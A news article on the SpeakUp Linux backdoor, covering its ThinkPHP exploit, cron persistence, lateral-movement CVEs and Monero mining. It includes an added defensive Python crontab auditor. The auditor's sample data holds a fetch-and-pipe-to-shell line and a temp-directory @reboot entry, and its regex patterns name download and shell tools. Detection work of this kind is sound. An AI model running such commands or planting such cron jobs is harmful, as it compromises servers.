Security researchers discover new Linux backdoor named SpeakUp

SpeakUp backdoor trojan can run on six different Linux distributions, and even on macOS.


Hackers have developed a new backdoor trojan that is capable of running on Linux systems. Named SpeakUp, this malware is currently distributed to Linux servers mainly located in China.

The hackers behind this recent wave of attacks are using an exploit for the ThinkPHP framework to infect servers with this new malware strain.


Once the trojan gains a foothold on vulnerable systems, hackers can use it to modify the local cron utility to gain boot persistence, run shell commands, execute files downloaded from a remote command and control (C&C) server, and update or uninstall itself.
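For defenders, the cron persistence described above can be audited. The following is an added example, not code from Check Point or from the malware: it parses crontab text and scores jobs that fetch remote content, pipe it to an interpreter, reference a temp-directory path, or run at boot. The rule set, weights, threshold and sample crontab are assumptions made for illustration, not SpeakUp indicators.

```python
import re

# Weighted heuristics: assumptions chosen for this example, not SpeakUp IoCs.
RULES = {
    "remote-url": (1, re.compile(r"\b(?:https?|ftp)://", re.I)),
    "fetch-tool": (1, re.compile(r"\b(?:curl|wget)\b")),
    "pipe-to-interpreter": (2, re.compile(r"\|\s*(?:(?:ba|da|z)?sh|python[\d.]*|perl|php)\b")),
    "temp-dir-path": (2, re.compile(r"(?:^|[\s;&|])(?:/tmp|/var/tmp|/dev/shm)/\S")),
}
THRESHOLD = 3  # a lone weak signal (e.g. a plain download) stays below this
SCHEDULE = re.compile(r"^(@\w+|(?:\S+\s+){4}\S+)\s+(.+)$")
ENV_LINE = re.compile(r"^[A-Za-z_]\w*\s*=")

def parse_entry(line, system=False):
    """Return (schedule, command) for a cron job line, or None."""
    line = line.strip()
    m = SCHEDULE.match(line)
    if not m or line.startswith("#") or ENV_LINE.match(line):
        return None
    schedule, rest = m.groups()
    if system:  # /etc/crontab and /etc/cron.d/* add a user field
        rest = re.sub(r"^\S+\s*", "", rest)
    return (schedule, rest) if rest else None

def audit(text, system=False):
    """Return [(line_no, schedule, score, [rule names], command)] for flagged jobs."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        entry = parse_entry(line, system)
        if entry is None:
            continue
        schedule, cmd = entry
        hits = [n for n, (_, rx) in RULES.items() if rx.search(cmd)]
        # A job that runs at every boot (persistence) adds 1 to the score.
        score = sum(RULES[n][0] for n in hits) + (schedule == "@reboot")
        if score >= THRESHOLD:
            findings.append((no, schedule, score, hits, cmd))
    return findings

SAMPLE = """\
# constructed sample crontab; 203.0.113.10 is a documentation address
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsSL http://203.0.113.10/u | sh
@reboot /tmp/.cache/svc
15 2 * * 0 wget -q https://example.org/report.csv -O /srv/data/report.csv
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

Feed it the output of `crontab -l` for each user, and the contents of `/etc/crontab` and `/etc/cron.d/*` with `system=True`.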

Check Point researchers, who first spotted this new backdoor three weeks ago, on January 14, say SpeakUp also comes with a built-in Python script that the malware uses to spread laterally through the local network.

This script can scan local networks for open ports, brute-force nearby systems using a list of pre-defined usernames and passwords, and use one of seven exploits to take over unpatched systems. This list of second-stage exploits includes the likes of:

  • CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities
  • CVE-2010-1871: JBoss Seam Framework remote code execution
  • JBoss AS 3/4/5/6: Remote Command Execution
  • CVE-2017-10271: Oracle WebLogic wls-wsat Component Deserialization RCE
  • CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware.
  • Hadoop YARN ResourceManager - Command Execution
  • CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability.

Once it infects new machines, SpeakUp deploys itself to these new systems. Check Point says SpeakUp can run on six different Linux distributions and even macOS systems.

The group behind this recent scan-and-infect campaign has been busy using SpeakUp to deploy Monero cryptocurrency miners on infected servers. The Check Point team says the group has made roughly 107 Monero coins since the start of their campaign, which is around $4,500.

While the SpeakUp authors are currently exploiting a vulnerability (CVE-2018-20062) in a Chinese-only PHP framework, they can easily switch to any other exploit to spread their backdoor to an even wider array of targets, although they haven't been seen targeting anything except ThinkPHP.


A map of current infections shows that SpeakUp victims are mainly concentrated in Asia and South America. Speaking to ZDNet, Lotem Finkelstein, one of the Check Point researchers, told us the infections in non-Chinese countries come from SpeakUp using its second-stage exploits to infect companies' internal networks, which resulted in the trojan spreading outside the normal geographical area of a Chinese-only PHP framework.

Figure: SpeakUp infection map (Image: Check Point)

The group behind the SpeakUp backdoor is the latest threat actor that has jumped on the ThinkPHP exploitation bandwagon.

Scans and attacks targeting websites and web apps built on top of this Chinese PHP framework started last year. According to our previous coverage, attackers initially only prodded websites, looking for vulnerable hosts and testing proof-of-concept code.

Those scans moved into full-blown exploitation in January, as many security experts predicted. Trend Micro reported two hacker groups using the same ThinkPHP vulnerability to infect Linux servers with the Hakai and Yowai IoT/DDoS malware.

Akamai experts also saw a different set of attacks, with threat actors dropping web shell backdoors, cryptocurrency mining software, and even Windows malware.

The group behind the SpeakUp malware seems to be the most organized of all the threat actors currently targeting the ThinkPHP ecosystem.

The full Check Point report, including indicators of compromise (IOCs), is available here.
